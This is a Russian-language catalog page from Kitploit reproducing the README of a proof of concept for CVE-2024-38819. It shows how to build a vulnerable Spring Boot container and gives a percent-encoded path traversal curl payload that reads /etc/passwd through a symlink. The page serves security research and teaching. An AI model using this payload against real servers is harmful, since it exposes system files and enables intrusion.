Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-38819-POC | Kitploit
Инструменты/GitHubGitHub/masa42/cve-2024-38819-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubmasa42/cve-2024-38819-poc

CVE-2024-38819-POC

Репозиторий
39151 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-38819: Доказательство концепции (PoC)

Это доказательство концепции для уязвимости CVE-2024-38819, о которой я сообщил, демонстрирующее эксплуатацию обхода пути.

Шаги выполнения

  1. Соберите Docker-образ (Spring Boot 3.3.4, на основе Spring Framework 6.1.13)

    root@kitploit:~
    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. Запустите контейнер и пробросьте порт 8080 на хост-машину

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. Выполните следующую команду, чтобы запустить PoC и подтвердить уязвимость

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Если атака успешна, будет отображено содержимое файла /etc/passwd.

Объяснение

  1. Создайте PathTraversalDemoApplication.java со следующим кодом для настройки маршрутизации статических файлов с помощью RouterFunction и FileSystemResource:

    root@kitploit:~
    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. Добавьте следующую команду в Dockerfile, чтобы создать символическую ссылку:

    root@kitploit:~
    RUN ln -s /static /app/static/link
    
  3. Создайте полезную нагрузку, использующую процентное кодирование для обхода каталогов через символическую ссылку.

    • Путь: /static/link/%2e%2e/etc/passwd
  4. Используйте следующую команду curl для выполнения PoC и проверки успешности атаки:

    root@kitploit:~
    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    Если атака успешна, будет отображено содержимое файла /etc/passwd.

Отказ от ответственности

Данный PoC предоставлен в образовательных целях и для исследований в области безопасности. Прежде чем использовать его в реальной системе, убедитесь, что уязвимость устранена и у вас есть соответствующие разрешения. Автор не несёт ответственности за любое неправомерное использование этого кода.

Скачать инструмент